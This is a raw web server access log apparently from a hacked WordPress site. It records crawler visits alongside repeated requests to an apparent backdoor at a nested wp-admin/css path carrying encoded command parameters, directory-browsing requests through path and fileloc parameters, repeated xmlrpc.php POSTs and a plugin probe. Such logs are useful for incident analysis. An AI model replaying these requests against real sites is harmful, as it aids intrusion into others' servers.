142.4.205.1 - - [16/Oct/2025:11:12:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313136342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373536342q3966623862623534306239393436353439326338346232623733346336653430222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
217.182.195.126 - - [16/Oct/2025:11:13:44 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/rbNiEwZzfMKL.ogm&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 8927 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:46 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/.channels HTTP/1.0" 200 7213 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:47 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/.registry HTTP/1.0" 200 7084 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:49 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/data HTTP/1.0" 200 6732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:51 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/docs HTTP/1.0" 200 6733 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:53 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/ext HTTP/1.0" 200 6732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:55 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/tests HTTP/1.0" 200 6732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:57 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 7209 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:58 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/images/images/images HTTP/1.0" 200 7420 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:13:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313138342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373538342q3831323336613939633164393735313135393934323763323766363935323062222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:11:14:12 -0400] "GET /zhHant/product/surugaya/A1623689268?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.0" 200 24589 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:13:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313230342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373630342q3633346330333863306364323337623463613937363664386239363565323562222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:13:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313232342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373632342q3663323462393461633431636332636138656162353435623164656562346666222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:14:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313234342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373634342q3564663138353664376237396333663038303234636539323434383630323566222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:14:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313236342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373636342q3238353562373564383263393865373335326438623439386631643531646236222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:14:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313238342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373638342q3531376439383838303836343963656330303331343161303733373834643364222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:15:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313330342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373730342q3636333366346634323865666333353262623164666238393932333763623635222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:15:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313332342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373732342q3464333030333362356563623062353537383830656165636230363733363037222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:15:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313334342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373734342q3236313862383762393964643362363562336130373766386631333537636366222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:16:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313336342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373736342q6130306466626361326263363033366263336431333239376337633763303338222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:16:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313338342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373738342q6462313038376634383932303433356638363230626465646138323963396361222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.70 - - [16/Oct/2025:11:17:40 -0400] "GET /market/2274457637.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:11:16:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313430342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373830342q6564633566323238386535653833323430356230373833393232386636303933222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:17:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313432342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373832342q6630373065346637336537383262333164393936343138396239326136306134222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:17:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313434342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373834342q6364626136383731363266376531333930336230353732633966653932303630222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
46.4.29.155 - - [16/Oct/2025:11:18:39 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:17:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313436342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373836342q3739393230646131303739656233373137653736626437373239303866626539222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
46.4.29.155 - - [16/Oct/2025:11:18:51 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
46.4.29.155 - - [16/Oct/2025:11:19:01 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:18:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313438342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373838342q6361363164626339343665373131303464316336656366343764653034363933222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
46.4.29.155 - - [16/Oct/2025:11:19:14 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:18:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313530342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373930342q6434656137343433343730643264373564623334323530623063323633366231222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
46.4.29.155 - - [16/Oct/2025:11:19:25 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
46.4.29.155 - - [16/Oct/2025:11:19:35 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:18:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313532342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373932342q3532666563656438333132663839333935313131653632336537326330353233222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:19:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313534342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373934342q3332303232303931313331386135663634643735313562373863386561646437222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:11:20:14 -0400] "GET /?_g=1209492 HTTP/1.0" 200 25099 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.215.90.129 - - [16/Oct/2025:11:20:16 -0400] "GET /wp-json/sure-triggers/v1/ HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
91.215.90.129 - - [16/Oct/2025:11:20:16 -0400] "GET /wp-content/plugins/suretriggers/assets/images/STLogo.svg HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
142.4.205.1 - - [16/Oct/2025:11:19:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313536342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373936342q3061323338393836613166643838363739663638356535653765313535613963222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:19:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313538342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373938342q3037373866326563366236373762333037646230623138393430396636373436222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:20:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313630342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383030342q3462626134303563343263313531623239663865643461653734626663656362222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:20:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313632342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383032342q3632323536316135646662643563393133643837663864656636626361383637222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:20:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313634342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383034342q6437303262383632326562663032643963306137663831663662386133336431222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:21:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313636342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383036342q3638356461383764316330643736386564396538613066393065313738363964222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.34 - - [16/Oct/2025:11:22:07 -0400] "GET /market/2274677870.htm?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/google8ab6971b28a6ff63.html&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 16707 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:11:21:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313638342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383038342q3632623736323939653366646633326235343065323733333731623032306562222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:21:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313730342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383130342q3566356234303530356536303238373935373630356366343565333764653638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
44.195.145.102 - - [16/Oct/2025:11:22:56 -0400] "GET /robots.txt HTTP/1.0" 200 4352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:22:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313732342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383132342q3164306330333031353437316363623862383335373131356337306664306335222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:22:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313734342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383134342q3865383166306162376161363066373261613961326437346232333261373237222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:22:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313736342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383136342q3136623633663535376531363063666664353566393734653939646561393961222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:23:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313738342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383138342q3765353762333266613462336632323662316633383734646661353831663363222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:23:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313830342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383230342q3730316439383535333865303961366232636330633164623731313862613866222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:23:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313832342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383232342q6166633434306335613433396431303736396236353033656137366536636265222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:24:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313834342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383234342q3932646532643133336537643430333866336137353533363166393262316633222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:24:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313836342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383236342q3261656165303336346536663137616530336537666565353737633063633563222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
